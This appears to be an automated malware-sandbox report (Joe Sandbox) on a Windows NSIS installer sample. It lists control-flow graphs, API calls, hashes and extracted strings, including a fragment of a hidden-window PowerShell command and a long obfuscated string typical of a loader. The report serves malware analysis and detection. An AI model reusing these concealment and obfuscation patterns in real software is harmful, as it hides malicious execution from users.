                                                  control_flow_graph 515 401774-401799 call 402dab call 405fc8 520 4017a3-4017b5 call 406682 call 405f51 lstrcatW 515->520 521 40179b-4017a1 call 406682 515->521 526 4017ba-4017bb call 406930 520->526 521->526 530 4017c0-4017c4 526->530 531 4017c6-4017d0 call 4069df 530->531 532 4017f7-4017fa 530->532 539 4017e2-4017f4 531->539 540 4017d2-4017e0 CompareFileTime 531->540 533 401802-40181e call 406172 532->533 534 4017fc-4017fd call 40614d 532->534 542 401820-401823 533->542 543 401892-4018bb call 405707 call 403376 533->543 534->533 539->532 540->539 544 401874-40187e call 405707 542->544 545 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 542->545 555 4018c3-4018cf SetFileTime 543->555 556 4018bd-4018c1 543->556 557 401887-40188d 544->557 545->530 577 401869-40186a 545->577 559 4018d5-4018e0 FindCloseChangeNotification 555->559 556->555 556->559 560 402c38 557->560 563 4018e6-4018e9 559->563 564 402c2f-402c32 559->564 562 402c3a-402c3e 560->562 567 4018eb-4018fc call 4066bf lstrcatW 563->567 568 4018fe-401901 call 4066bf 563->568 564->560 574 401906-4023a7 call 405ce2 567->574 568->574 574->562 574->564 577->557 579 40186c-40186d 577->579 579->544
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
                                                  • CompareFileTime.KERNEL32(-00000014,?,Biotopen,Biotopen,00000000,00000000,Biotopen,C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs,?,?,00000031), ref: 004017DA
                                                    • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                    • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD), ref: 00405762
                                                    • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: -windowstyle hidden ; $limpiness=Get-Content 'C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\ravnemorens\Fr$Biotopen$C:\Users\user\AppData\Local\Temp\roentgenometry\peptidoglycan$C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs
                                                  • API String ID: 1941528284-3702912017
                                                  • Opcode ID: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                  • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                  • Opcode Fuzzy Hash: 32c4a55105527fe5635505d43395af282a95c9cc107a8a3e81d671ed76634ab9
                                                  • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 581 405707-40571c 582 405722-405733 581->582 583 4057d3-4057d7 581->583 584 405735-405739 call 4066bf 582->584 585 40573e-40574a lstrlenW 582->585 584->585 587 405767-40576b 585->587 588 40574c-40575c lstrlenW 585->588 590 40577a-40577e 587->590 591 40576d-405774 SetWindowTextW 587->591 588->583 589 40575e-405762 lstrcatW 588->589 589->587 592 405780-4057c2 SendMessageW * 3 590->592 593 4057c4-4057c6 590->593 591->590 592->593 593->583 594 4057c8-4057cb 593->594 594->583
                                                  APIs
                                                  • lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                  • lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                  • lstrcatW.KERNEL32(00421F28,004030AD), ref: 00405762
                                                  • SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction ID: 0122bdc4cc194b68d617bf21deccaf32741d68d09ea49b6ef8aede989cb0ca1f
                                                  • Opcode Fuzzy Hash: 478899543bd82950d8a4d30903f75c7e93d106f960787587e0f6081d0d83e678
                                                  • Instruction Fuzzy Hash: F9219D71900618FACF119FA5DD84ACFBFB9EF45364F10843AF904B62A0C7794A419FA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 595 406a06-406a26 GetSystemDirectoryW 596 406a28 595->596 597 406a2a-406a2c 595->597 596->597 598 406a3d-406a3f 597->598 599 406a2e-406a37 597->599 601 406a40-406a73 wsprintfW LoadLibraryExW 598->601 599->598 600 406a39-406a3b 599->600 600->601
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                  • wsprintfW.USER32 ref: 00406A58
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                  • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                  • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 602 406bf1-406c14 603 406c16-406c19 602->603 604 406c1e-406c21 602->604 606 40763e-407642 603->606 605 406c24-406c2d 604->605 607 406c33 605->607 608 40763b 605->608 609 406c3a-406c3e 607->609 610 406d7a-407421 607->610 611 406cdf-406ce3 607->611 612 406d4f-406d53 607->612 608->606 618 406c44-406c51 609->618 619 407626-407639 609->619 623 407423-407439 610->623 624 40743b-407451 610->624 616 406ce9-406d02 611->616 617 40758f-407599 611->617 613 406d59-406d6d 612->613 614 40759e-4075a8 612->614 621 406d70-406d78 613->621 614->619 622 406d05-406d09 616->622 617->619 618->608 620 406c57-406c9d 618->620 619->606 625 406cc5-406cc7 620->625 626 406c9f-406ca3 620->626 621->610 621->612 622->611 628 406d0b-406d11 622->628 627 407454-40745b 623->627 624->627 631 406cd5-406cdd 625->631 632 406cc9-406cd3 625->632 629 406ca5-406ca8 GlobalFree 626->629 630 406cae-406cbc GlobalAlloc 626->630 635 407482-40748e 627->635 636 40745d-407461 627->636 633 406d13-406d1a 628->633 634 406d3b-406d4d 628->634 629->630 630->608 638 406cc2 630->638 631->622 632->631 632->632 639 406d25-406d35 GlobalAlloc 633->639 640 406d1c-406d1f GlobalFree 633->640 634->621 635->605 641 407610-40761a 636->641 642 407467-40747f 636->642 638->625 639->608 639->634 640->639 641->619 642->635
                                                  Strings
                                                  • Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt, xrefs: 00406BF1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt
                                                  • API String ID: 0-2464786353
                                                  • Opcode ID: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                  • Instruction ID: 70604387997e4686e0750d9790b47f8334db0f7ece30ebb4bbc07469160fd387
                                                  • Opcode Fuzzy Hash: b14ce6b3d8018a6f0b050b5be2694dad1ee6778a4c7b40431f4b258f42aa93ca
                                                  • Instruction Fuzzy Hash: A4816571D04228DBDF24CFA8C8447ADBBB0FF44315F20856AD856BB281C7786A86DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 643 40347e-4034a6 GetTickCount 644 4035d6-4035de call 403033 643->644 645 4034ac-4034d7 call 4035fd SetFilePointer 643->645 650 4035e0-4035e4 644->650 651 4034dc-4034ee 645->651 652 4034f0 651->652 653 4034f2-403500 call 4035e7 651->653 652->653 656 403506-403512 653->656 657 4035c8-4035cb 653->657 658 403518-40351e 656->658 657->650 659 403520-403526 658->659 660 403549-403565 call 406bf1 658->660 659->660 661 403528-403548 call 403033 659->661 665 4035d1 660->665 666 403567-40356f 660->666 661->660 670 4035d3-4035d4 665->670 668 403571-403579 call 406224 666->668 669 403592-403598 666->669 673 40357e-403580 668->673 669->665 672 40359a-40359c 669->672 670->650 672->665 674 40359e-4035b1 672->674 675 403582-40358e 673->675 676 4035cd-4035cf 673->676 674->651 677 4035b7-4035c6 SetFilePointer 674->677 675->658 678 403590 675->678 676->670 677->644 678->674
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403492
                                                    • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                  • SetFilePointer.KERNELBASE(00064084,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                  Strings
                                                  • Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt, xrefs: 004034D7, 00403572
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID: Star EBurea3 KogeEPa.beEUrea Eapp.iE pposE UndeDBrobyECagg.CStockEPuste2De.inFGland6Isv,nF varsAtjansFLimewEAm.sb8Afstn9ZebueBCri,p6ChromATele.9SubumBHeaviF HaevAProto8ExistBAfsv,3Hyd,oFAutob6DrainFSoftwABesvaFbr,ndE Bade9 Hjem3AdvokAFil.s9 Spi,AKo.mu9tungeASt
                                                  • API String ID: 1092082344-2464786353
                                                  • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                  • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                  • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                  • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 679 4061a1-4061ad 680 4061ae-4061e2 GetTickCount GetTempFileNameW 679->680 681 4061f1-4061f3 680->681 682 4061e4-4061e6 680->682 684 4061eb-4061ee 681->684 682->680 683 4061e8 682->683 683->684
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004061BF
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403643,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F), ref: 004061DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-678247507
                                                  • Opcode ID: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction ID: d5af49f5aac0e4cb02feadf6e990f33ccb34da23aa7fbf3522b8764b63faf6c0
                                                  • Opcode Fuzzy Hash: ca4f867381b256d976a036b4ee2479ffffcb38332db50c9e5a73bf50e74bc53e
                                                  • Instruction Fuzzy Hash: 90F09076701204BFEB008F59DD05E9EB7BCEBA5710F11803EF901F7240E6B49A648764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 769 4015c6-4015da call 402dab call 405ffc 774 401636-401639 769->774 775 4015dc-4015ef call 405f7e 769->775 777 401668-4022fb call 401423 774->777 778 40163b-40165a call 401423 call 406682 SetCurrentDirectoryW 774->778 784 4015f1-4015f4 775->784 785 401609-40160c call 405c30 775->785 792 402c2f-402c3e 777->792 778->792 795 401660-401663 778->795 784->785 786 4015f6-4015fd call 405c4d 784->786 793 401611-401613 785->793 786->785 800 4015ff-401607 call 405bd6 786->800 796 401615-40161a 793->796 797 40162c-401634 793->797 795->792 801 401629 796->801 802 40161c-401627 GetFileAttributesW 796->802 797->774 797->775 800->793 801->797 802->797 802->801
                                                  APIs
                                                    • Part of subcall function 00405FFC: CharNextW.USER32(?,?,00425750,?,00406070,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\87tBuE42ft.exe"), ref: 0040600A
                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 0040600F
                                                    • Part of subcall function 00405FFC: CharNextW.USER32(00000000), ref: 00406027
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                    • Part of subcall function 00405BD6: CreateDirectoryW.KERNEL32(0042C800,?), ref: 00405C18
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs,?,00000000,000000F0), ref: 00401652
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs, xrefs: 00401645
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\Usitative\healthless\hovedanpartshaver\Cricotomy66\Refleksivs
                                                  • API String ID: 1892508949-3791577056
                                                  • Opcode ID: 7810f3b9862933f516a80dd279214b37acf0e7086c8c43899a93194b2515cc03
                                                  • Instruction ID: 68e4a3e0657f1f56d5d8600c1d99eb964219fead50354605c61944b677c9a350
                                                  • Opcode Fuzzy Hash: 7810f3b9862933f516a80dd279214b37acf0e7086c8c43899a93194b2515cc03
                                                  • Instruction Fuzzy Hash: DD11BE31404214ABCF20AFB5CD0099F36B0EF04368B25493FE946B22F1DA3E4A819B5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 805 4071d5-4071db 806 4071e0-4071fe 805->806 807 4071dd-4071df 805->807 808 4074d1-4074de 806->808 809 40740c-407421 806->809 807->806 810 407508-40750c 808->810 811 407423-407439 809->811 812 40743b-407451 809->812 814 40756c-40757f 810->814 815 40750e-40752f 810->815 813 407454-40745b 811->813 812->813 819 407482 813->819 820 40745d-407461 813->820 818 407488-40748e 814->818 816 407531-407546 815->816 817 407548-40755b 815->817 821 40755e-407565 816->821 817->821 828 406c33 818->828 829 40763b 818->829 819->818 823 407610-40761a 820->823 824 407467-40747f 820->824 825 407505 821->825 826 407567 821->826 827 407626-407639 823->827 824->819 825->810 840 4074ea-407502 826->840 841 40761c 826->841 831 40763e-407642 827->831 832 406c3a-406c3e 828->832 833 406d7a-406d9b 828->833 834 406cdf-406ce3 828->834 835 406d4f-406d53 828->835 829->831 832->827 842 406c44-406c51 832->842 833->809 838 406ce9-406d02 834->838 839 40758f-407599 834->839 836 406d59-406d6d 835->836 837 40759e-4075a8 835->837 844 406d70-406d78 836->844 837->827 845 406d05-406d09 838->845 839->827 840->825 841->827 842->829 843 406c57-406c9d 842->843 846 406cc5-406cc7 843->846 847 406c9f-406ca3 843->847 844->833 844->835 845->834 848 406d0b-406d11 845->848 851 406cd5-406cdd 846->851 852 406cc9-406cd3 846->852 849 406ca5-406ca8 GlobalFree 847->849 850 406cae-406cbc GlobalAlloc 847->850 853 406d13-406d1a 848->853 854 406d3b-406d4d 848->854 849->850 850->829 855 406cc2 850->855 851->845 852->851 852->852 856 406d25-406d35 GlobalAlloc 853->856 857 406d1c-406d1f GlobalFree 853->857 854->844 855->846 856->829 856->854 857->856
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782823907.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_87tBuE42ft.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                  • Instruction ID: 5108979c3f50e514b4d7e1fb6dd8ed840f295859cf3be547aab63c341a9fbe83
                                                  • Opcode Fuzzy Hash: 5aa4d090f2ad8984d83f4f4e641c2e75da78772a5538c6e641319c1bffeb23fb
                                                  • Instruction Fuzzy Hash: 8BA14471E04228DBDF28CFA8C8446ADBBB1FF44305F14856AD856BB281C7786A86DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1782662054.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1782642464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782687459.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1782706666.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
